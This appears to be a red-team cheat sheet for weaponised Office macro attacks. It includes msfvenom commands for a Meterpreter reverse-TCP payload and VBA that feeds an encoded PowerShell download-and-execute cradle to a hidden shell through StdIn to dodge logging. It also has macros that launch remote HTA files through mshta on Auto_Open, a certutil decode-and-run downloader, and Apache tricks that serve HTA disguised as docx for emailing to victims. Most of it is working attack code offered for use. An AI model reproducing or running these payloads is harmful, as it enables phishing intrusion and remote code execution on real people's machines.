Paste the output of the first portion of the payload script into the editor, save it.
Paste the remainder of the script into the word document itself. This is when you would perform the client-side attack by emailing this Word document to someone.
#Msfvenom
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PN> -e x86/shikata_ga_nai -f vba-exe
msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread
#Other formats:
-f vba-psh, vba (No need to follow below steps)
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'*
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
1] Create a .DOTM template document containing Macros
2] Create a .DOCX file from Word default templates -> Rename as .zip -> Extract .zip -> Modify word\_rels\settings.xml.rels
3] Save file → Select all unzipped files and zip → Change extension to .docx
4] Execution
Opening the document creates 4 HTTP requests.
Even without enable documents you can see if the doc was opened. → Good for metrics
Hidden in File Properties - Stdin to Avoid Logging
Command resides in "Author"/ Custom Excel form / Encoded form.
Hides PS commands from cmdline logging via invocation with StdIn.WriteLine
Trigger from a button.
Leveraging unused code for obfuscation.
Public Sub PrintDocumentProperties()
Dim oApp As New Excel.Application
Dim oWB As Workbook
Set oWB = ActiveWorkbook
Dim Exec As String
#If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
#Else
Dim rwxpage As Long, res As Long
#End If
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
Set objWshell = VBA.CreateObject("WScript.Shell")
Dim c As String
Const quote As String = """"
c = "WwBTAHkAUwB0AGUAbQAuAE4AZQBUAC4AUwBlAHIAdgBpAEMAZQBQAE8ASQBOAHQATQBhAE4AYQBnAEUAUgBdADoAOgBFAFgAcABlAEMAVAAxADAAMABDAG8AbgB0AGkATgBVAEUAIAA9ACAAMAA7ACQAVwBjAD0ATgBlAFcALQBPAEIASgBFAGMAVAAgAFMAWQBTAHQAZQBNAC4ATgBlAFQALgBXAGUAYgBDAEwAaQBlAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgARQBhAEQAZQByAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAUgBPAFgAeQAgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBlAHQALgBXAEUAQgBSAEUAcQB1AEUAcwB0AF0AOgA6AEQARQBGAEEAVQBMAFQAVwBFAEIAUABSAE8AWAB5ADsAJABXAEMALgBQAFIATwBYAFkALgBDAFIARQBEAGUATgBUAEkAQQBsAHMAI"
c = c + "AA9ACAAWwBTAFkAcwBUAGUAbQAuAE4ARQB0AC4AQwByAEUAZABFAG4AVABJAEEAbABDAEEAYwBoAEUAXQA6ADoARABlAGYAQQBVAGwAdABOAEUAdAB3AG8AUgBLAEMAcgBlAGQAZQBuAHQAaQBhAGwAUwA7ACQASwA9ACcAMwBlACoARwBrAFkATABVAFMAdgA2AGEAYgA0AE8ASwAhACUAUABpAEAAJAB0AHEAOQBcAD4AfAB+AHUAKwBSACcAOwAkAGkAPQAwADsAWwBjAGgAQQBSAFsAXQBdACQAYgA9ACgAWwBjAEgAYQByAFsAXQBdACgAJABXAGMALgBEAE8AdwBOAEwATwBBAEQAUwB0AFIAaQBOAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgA3ADoAOAAwADgAMAAvAGkAbgBkAGUAeAAuAGEAcwBwACIAKQApACkAfAAlAHsAJABfAC0AYgBYAG8AcgAkAGsAWwAkAEkAKwArACUAJABLAC4ATABlAG4AZwB0AGgAXQB9ADsASQBFAFgAIAAoACQAQgAtAEoATwBJAE4AJwAnACkA"
Dim objWshell1 As Object
Set objWshell1 = CreateObject("WScript.Shell")
With objWshell1.Exec("powershell.exe -nop -windowstyle hidden -Command -")
.StdIn.WriteLine author
.StdIn.WriteBlankLines 1
.Terminate
End With
End Sub
ActiveX Control for Macro Execution
Idea is to move away from traditionally used AutoOpen() and Document_Open() which are noisy.
Macro > Contains RTF > Contains Signed binary + DLL as OLE objects
Combined RTF's default behaviour of dropping OLE objects to TEMP folder, with DLL Hijacking vulnerability of trusted Kaspersky executable and custom-made MSF loader.
HTA run is cached in %localappdata%\Microsoft\Windows\INetCache\IE - Important for cleanup
#https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1
Out-HTA -PayloadURL http://192.168.254.1/Get-Information.ps1
#From Macro execute HTA
Sub HelloWorld()
PID = Shell("mshta.exe https://192.168.125.1/Update.hta")
End Sub
Sub Auto_Open()
HelloWorld
End Sub
-------
#Download and execute Base64-encoded payload.
Sub DownloadAndExec()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://trusted.domain/encoded.crt", False
xHttp.Send
With bStrm
.Type = 1 '//binary
.Open
.write xHttp.responseBody
.savetofile "encoded.crt", 2 '//overwrite
End With
Shell ("cmd /c certutil -decode encoded.crt encoded.hta & start encoded.hta")
End Sub
Files saved may be saved by user → Since filetype is changed accordingly, default application won't be mshta. Use this option only if client's proxy blocks HTA files.
If the victim directly opens the file instead of saving, it will still execute as mshta.exe
Change mime type within Apache and bypass a filter based on the file extension. [Eg: hta.docx]
nano /etc/apache2/apache2.confBrowse to "/var/www/" location#Change the "AllowOverride" from "None" to "All"service apache2 restartYou can now leverage .htaccess files to change the extensions mime type#Create a .htaccess file in the root web directoryInsert "AddType application/hta docx"This will specify that the docx file extension should be served asanhtaapplication.Once .htaccess is saved, changes are immediate.
The Windows Script Host is implemented in cscript.exe and wscript.exe is responsible for execution of wide variety of scripts such as js,vbs,vbe.
JScript
Javascript in Windows means JScript: MS implementation of ECMAScript. Like VBScipt, JScript can be executed by standalone engines on Windows or engines implemented by IE or Edge.